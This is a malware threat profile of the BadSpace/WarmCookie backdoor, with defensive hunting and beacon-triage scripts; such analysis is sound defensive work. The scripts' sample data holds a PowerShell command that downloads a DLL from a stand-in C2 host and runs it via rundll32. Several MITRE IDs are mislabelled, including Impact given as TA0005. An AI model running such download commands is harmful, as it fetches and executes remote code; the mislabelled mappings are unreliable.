
BadSpace (Backdoor) – Malware

June 12, 2024

BadSpace

Type of Malware

Backdoor

Country of Origin

Unknown

Date of initial activity

2024

Targeted Countries

Global

Motivation

Data Theft
Financial Gain

Attack Vectors

Phishing

Targeted Systems

Windows

Type of Information Stolen

System Information
Browser Data

Overview

BadSpace is an emerging and sophisticated form of malware that has recently captured the attention of cybersecurity experts due to its advanced capabilities and evasive tactics. Discovered in early 2024, BadSpace represents a significant evolution in the landscape of malicious software, leveraging innovative techniques to compromise systems and exfiltrate sensitive data. Its development and deployment highlight an escalating trend in cyber threats, where attackers continually refine their methods to bypass traditional security measures.

Targets

Individual Users

How they operate

Infection Chain and Initial Access

BadSpace typically infiltrates systems through a multi-stage infection chain that begins with compromised websites. These sites host malicious JavaScript code embedded within legitimate web pages or injected into JavaScript libraries such as jQuery. When a user visits an infected website, the malicious script sets a cookie to track the visit and then constructs a URL with various query parameters, including device information and user agent details. This URL is used to request a payload that replaces the original webpage. In some instances, users are prompted to download a fake browser update which, upon execution, delivers the BadSpace backdoor or its JScript downloader to the victim's system.

Execution and Obfuscation Techniques

The JScript files used in the BadSpace infection employ advanced obfuscation techniques to obscure their true intent. The obfuscation process involves shifting arrays and applying complex transformations to variable and function names. Notably, the JScript code uses a combination of dynamic function calls and external obfuscation tools such as JavaScript Compressor by Dean Edwards to further complicate analysis. Once de-obfuscated, the JScript file executes a PowerShell command to silently download and run the BadSpace backdoor. The downloaded file is launched with rundll32.exe, which keeps the malware concealed from casual detection.

Anti-Sandbox and Persistence Mechanisms

BadSpace incorporates several anti-sandbox techniques designed to detect and evade analysis environments. These include checking the number of folders in specific directories, querying the Windows registry for particular keys, and evaluating system memory and processor details. The malware uses its own thresholds for each of these checks to differentiate real environments from sandbox setups.
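The execution chain just described (a JScript dropper run by a Windows script host, spawning PowerShell to download the payload, which is then launched through rundll32.exe) is the part of the infection a SOC can hunt for in process-creation telemetry. The script below is an added example, not code from this article or from the researchers who analysed BadSpace. The events it runs over are constructed Sysmon-style records with made-up PIDs, paths and a placeholder URL, and the path and command-line heuristics it applies are assumptions, not observed BadSpace values.

```python
"""Hunt for the BadSpace-style execution chain in process-creation telemetry.

Added example, not code from the original article. The chain it looks for is
the one the write-up describes: script host -> PowerShell downloader ->
rundll32.exe loading a DLL from a user-writable directory.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Heuristics (assumptions): where a browser-download chain usually writes,
# and PowerShell flags typical of a silent downloader.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads|ProgramData|Public)\\", re.I)
DOWNLOAD_HINTS = re.compile(
    r"(DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Start-BitsTransfer"
    r"|-w(indowstyle)?\s+hidden|-enc(odedcommand)?\b)",
    re.I,
)


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the new process
    cmdline: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(event: ProcEvent, by_pid: dict, depth: int = 4) -> list[str]:
    """Executable names from the process up through its parents (child first)."""
    chain = [basename(event.image)]
    cur = event
    for _ in range(depth):
        cur = by_pid.get(cur.ppid)
        if cur is None:
            break
        chain.append(basename(cur.image))
    return chain


def find_badspace_chains(events: list[ProcEvent]) -> list[tuple[int, str, str]]:
    """Return (pid, reason, chain) for every event matching a stage of the chain."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        name = basename(e.image)
        chain = ancestry(e, by_pid)
        # Stage 1: a script host launched PowerShell with downloader/hidden flags.
        if (name in POWERSHELL and len(chain) > 1 and chain[1] in SCRIPT_HOSTS
                and DOWNLOAD_HINTS.search(e.cmdline)):
            findings.append((e.pid, "script host launched PowerShell downloader",
                             " <- ".join(chain)))
        # Stage 2: rundll32 loading a DLL from a user-writable path under PowerShell.
        if (name == "rundll32.exe" and USER_WRITABLE.search(e.cmdline)
                and any(p in POWERSHELL for p in chain[1:])):
            findings.append((e.pid, "rundll32 executing DLL from user-writable path",
                             " <- ".join(chain)))
    return findings


# Constructed sample telemetry (not real events). The last record is a benign
# rundll32 launch from System32 that must not be flagged.
SAMPLE_EVENTS = [
    ProcEvent(1000, 900, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(1200, 1000, r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\alice\Downloads\browser-update.js"'),
    ProcEvent(1300, 1200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -w hidden -c (New-Object Net.WebClient).DownloadFile("
              r"'http://c2.example.invalid/w','C:\Users\alice\AppData\Local\Temp\u.dll')"),
    ProcEvent(1400, 1300, r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe C:\Users\alice\AppData\Local\Temp\u.dll,Run"),
    ProcEvent(1500, 1000, r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"),
]

if __name__ == "__main__":
    for pid, reason, chain in find_badspace_chains(SAMPLE_EVENTS):
        print(f"pid {pid}: {reason} [{chain}]")
```

The second rule is deliberately independent of the first: it still fires when the script host is missing from the tree (for example when the JScript was run from a different launcher), as long as rundll32.exe loads a DLL from a user-writable directory with PowerShell somewhere above it. In a real deployment the constructed list would be replaced by Sysmon Event ID 1 records, and the writable-path list tuned to the organisation's software-deployment habits.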
Once it passes these checks, BadSpace establishes persistence on the infected system through scheduled tasks and self-copying mechanisms. It creates a mutex with a unique UUID for each sample and configures scheduled tasks so that the backdoor remains active even after system reboots or manual deletions.

Command and Control Communication

The backdoor communicates with its command and control (C2) servers over an encrypted channel. Upon initial contact, BadSpace sends a cookie containing encrypted information about the infected system, including the computer name, OS version, and other identifying details. This cookie is encrypted with a hardcoded RC4 key and is sent along with a user agent string deliberately crafted to include additional spaces, which led to the malware's alternative name, WarmCookie. The C2 server can issue various commands to the infected system, including taking screenshots, executing command-line instructions, and reading or writing files.

Indicators of Compromise

To aid detection and response, several indicators of compromise (IOCs) associated with BadSpace have been identified. These include SHA256 hashes of the JavaScript droppers and BadSpace binaries, as well as IP addresses and domains used for C2 communication. For instance, notable IOCs include the JScript file with SHA256 c64cb9e0740c17b2561eed963a4d9cf452e84f462d5004ddbd0e0c021a8fdabc and the domains uhsee.com and kongtuke.com.
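The two C2 traits named above, a padded user agent and an RC4-encrypted cookie carrying system information, are what an analyst works with when triaging a captured beacon. The following is an added example, not code from this article or from any published BadSpace analysis. It assumes the cookie value is base64-encoded, uses a placeholder cookie name and a placeholder RC4 key (the real key is sample-specific and must be recovered from the binary), and runs over a constructed HTTP request rather than real traffic.

```python
"""Triage a suspected BadSpace/WarmCookie beacon request.

Added example, not code from the original article. Flags the padded
User-Agent and decrypts the RC4 cookie so the system fingerprint it carries
can be read during incident response. Key, cookie name and encoding are
constructed placeholders.
"""
from __future__ import annotations

import base64
import re

# Placeholder key for the demonstration only; a real triage uses the key
# extracted from the specific sample.
ASSUMED_RC4_KEY = b"placeholder-key"


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). The cipher is symmetric: encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):                          # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                             # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, path and a lower-cased header map."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers}


def padded_user_agent(ua: str) -> bool:
    """True when the UA contains runs of two or more spaces; browsers emit single spaces."""
    return re.search(r" {2,}", ua) is not None


def decrypt_cookie(cookie_header: str, name: str, key: bytes) -> str | None:
    """Find the named cookie, base64-decode it and RC4-decrypt it (assumed encoding)."""
    for part in cookie_header.split(";"):
        k, _, v = part.strip().partition("=")
        if k == name:
            return rc4(key, base64.b64decode(v)).decode("utf-8", errors="replace")
    return None


def triage(raw_request: str, key: bytes = ASSUMED_RC4_KEY,
           cookie_name: str = "session") -> dict:
    headers = parse_request(raw_request)["headers"]
    return {
        "padded_ua": padded_user_agent(headers.get("user-agent", "")),
        "decrypted_cookie": decrypt_cookie(headers.get("cookie", ""), cookie_name, key),
    }


# Constructed beacon: the cookie is built here with the same placeholder key so
# the round trip is verifiable; the fingerprint string is made up.
SAMPLE_PLAINTEXT = b"WS-ALICE|Windows 10.0.19045|alice"
SAMPLE_COOKIE = base64.b64encode(rc4(ASSUMED_RC4_KEY, SAMPLE_PLAINTEXT)).decode()
SAMPLE_REQUEST = (
    "GET /api/check HTTP/1.1\r\n"
    "Host: c2.example.invalid\r\n"
    "User-Agent: Mozilla/5.0  (Windows NT 10.0; Win64; x64)  AppleWebKit/537.36\r\n"
    f"Cookie: session={SAMPLE_COOKIE}\r\n"
    "\r\n"
)

if __name__ == "__main__":
    print(triage(SAMPLE_REQUEST))
```

The user-agent check needs no key and can run over proxy or web-gateway logs as a cheap detection; the cookie decryption only becomes possible once the sample's RC4 key has been recovered, at which point the decrypted fingerprint tells the responder which host name and OS build the beacon was reporting.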

MITRE Tactics and Techniques

Initial Access (TA0001)
  • Exploit Public-Facing Application (T1190): Delivered through compromised websites, often by exploiting vulnerabilities or injecting malicious code into JavaScript files.
  • Malicious File (T1203): Users are tricked into downloading and executing a fake browser update that contains the malware.

Execution (TA0002)
  • PowerShell (T1059.001): Uses PowerShell to download and execute the backdoor.
  • Command-Line Interface (T1059.003): Uses rundll32.exe to execute the payload.

Persistence (TA0003)
  • Scheduled Task/Job (T1053): Creates scheduled tasks to ensure persistence.
  • Registry Run Keys/Startup Folder (T1547.001): Uses registry entries and scheduled tasks to maintain persistence.

Privilege Escalation (TA0004)
  • None explicitly observed in the provided data, though malware often attempts privilege escalation to extend its capabilities.

Defense Evasion (TA0005)
  • Obfuscated Files or Information (T1027): Employs complex obfuscation techniques in both the JScript and the DLL.
  • Anti-Sandboxing (T1497): Implements anti-sandbox checks to avoid detection in analysis environments.

Credential Access (TA0006)
  • None explicitly observed in the provided data, though some backdoors collect credential information as part of their functionality.

Discovery (TA0007)
  • System Information Discovery (T1082): Collects system information such as OS version and computer name.

Lateral Movement (TA0008)
  • None explicitly observed in the provided data, though lateral movement could occur if the malware spreads within a network.

Collection (TA0009)
  • Screenshot (T1113): Capable of taking screenshots as part of its command set.

Exfiltration (TA0010)
  • Exfiltration Over Command and Control Channel (T1041): Sends collected data and system information back to the C2 server.

Impact (TA0005)
  • None explicitly observed in the provided data, though backdoors generally affect system integrity and security.